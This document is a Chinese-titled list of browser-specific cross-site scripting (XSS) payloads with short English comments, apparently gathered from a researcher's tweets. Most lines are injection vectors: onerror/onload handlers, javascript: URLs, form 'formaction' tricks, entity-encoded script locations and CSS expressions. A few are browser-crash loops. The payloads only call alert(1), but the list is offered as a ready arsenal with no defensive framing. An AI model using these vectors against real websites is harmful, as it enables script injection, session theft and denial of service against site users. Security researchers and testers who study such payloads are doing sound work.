一些经典的XSS跨站代码整理

<!-- " --!><input value="><img src=xx:x onerror=alert(1)//">
    <script/onload=alert(1)></script> IE9
    <style/onload=alert(1)>
    alert([0x0D]-->[0x0D]1<!--[0x0D])
    1<!--i
    document.write('<img src="<iframe/onload=alert(1)>\0">'); IE8
    JSON.parse('{"__proto__":["a",1]}')
    location++
    IE valid syntax: 我,啊=1,b=[我,啊],alert(我,啊)
    alert('aaa\0bbb') IE only show aaa http://jsbin.com/emekog
    <svg><animation xLI:href="javascript:alert(1)"> based on H5SC#88 #Opera
    Function('alert(arguments.callee.caller)')()
    firefox dos? while(1)find();
    <div/style=x:expression(alert(URL=1))>
    Inject <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7"> enabled css expression,breaking standard mode!
    <applet code=javascript:alert('sgl')> and <embed src=javascript:alert('sgl')> umm...cute FF!
    <math><script>sgl='<img/src=xx:x onerror=alert(1)>'</script> chrome firefox opera vector
    <svg><oooooo/oooooooooo/onload=alert(1) > works on webkit~
    <body/onload=\\\vbs\\\::::::::alert+'x'+[000000]+'o'+'x'+[000000]::::::::>
    vbs:alert+-[]
    <body/onload=vbs::::::::alert----+--+----1:::::::::>
    Firefox vector <math><a xlink:href="/mmme.me">click
    <svg><script>a='<svg/onload=alert(1)></svg>';alert(2)</script>
    Inj>> <script/src=/0.gg/xxxxx> << <script>...</script> less xss
    [code]Webkit X-XSS-Protection header is enabled just now :P
    <svg/onload=domain=id> 22 letters e.g http://fiddle.jshell.net./KG7fR/5/show/
    <?xml encoding="><svg/onload=alert(1)// >">
    <a "<img/src=xxx:x onerror=alert(1) >x</a> Distinctive IE
    Also <a `="<img/onerror=alert(1) src=xx:xx>'></h1>">x</a>
    <h1 "='<img/onerror=alert(1) src=xx:xx>'></h1> IE only
    <1h name="<svg/onload=alert(1)>"></1h>
    <img ="1 src=xxx:x onerror=alert(1)//" > works in not-IE
    javascript=1;for(javascript in RuntimeObject());javascript=='javascript'
    <body/onerror=alert(event)><img/src=javascript:throw[Object.getOwnPropertyNames(this)]> Firefox Sanbox object
    <img src='javascript:while([{}]);'> works in firefox
    for(x in document.open); Crash your IE 6:>
    localStorage.setItem('setItem',1)
    Only to find '?'.toUpperCase()==='?'.toUpperCase()
    J? H? T? W? Y? i? length==2
    '?'.toUpperCase()=='I'
    Also '?'.toUpperCase()=='SS'
    '?.toUpperCase() =='FF'// alike: ? FI ? FL ? FFI ? FFL ? ST ? ST
    #Opera data:text/html;base64,<<<<<<<<PH Nj cmlwdD5hb我-勒-个-去GVyd CgxKTwvc 2NyaXB0Pg=>>>>>>>>>>
    Firefox always the most cute data:_,<script>alert(1)</script>
    <a href="ftp:/baidu.com">xx</a>
    http://?????????? works in Firefox
    RegExp.prototype.valueOf=alert,/-/-/-/;//IE,is there anything else?
    location='&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#97&#108&#101&#114&#116&#40&#49&#41'
    for({} in {});
    興味深いhttp://jsbin.com/inekab for Opera only
    <a href=https:http://www.google.com>x</a> That's a relative path?
    document.frames==window.frames
    <a href="jar:xxx" id=x></a> x.protocol=='http:' on #firefox
    (0).constructor.constructor=function(){alert(eval(arguments[0].substr(6)))} Easy to decode jjencode and aaencode :D
    127.0x000000001==127.0.0.1
    <input value="&#31sefewfewf"/> Chrome input value block
    <svg><xmp><img/onerror=alert(1) src=xxx:x />
    <img src/="><img src=xxx:x onerror=alert(1)//">
    有趣的isindex <isindex formaction=javascript:alert(1) type=submit >
    chrome:xx - >chrome://crash/ crash?
    <form action=javascript:alert(1) /><input> Chrome input enter fucked!
    <form/><button/><keygen/> chrome send empty key,is funny~_~
    <form/><input/formaction=javascript:alert(1)> Because <form> not a void element.[/code
    [code]<form><input/name="isindex"> when name are isindex does not send key.
    <form id=x ></form><button form=x formaction="javascript:alert(1)">X It like http://html5sec.org/#1 but only chrome support .
    <script language="php">echo 1 ?> Fascinating.
    fvck:for(_?in?this)_['match'](/.Element$/)&&console.log(_)
    location.reload('javascript:alert(1)') //ie only,lol~
    {}alert(1)
    Twitter @jackmasa =P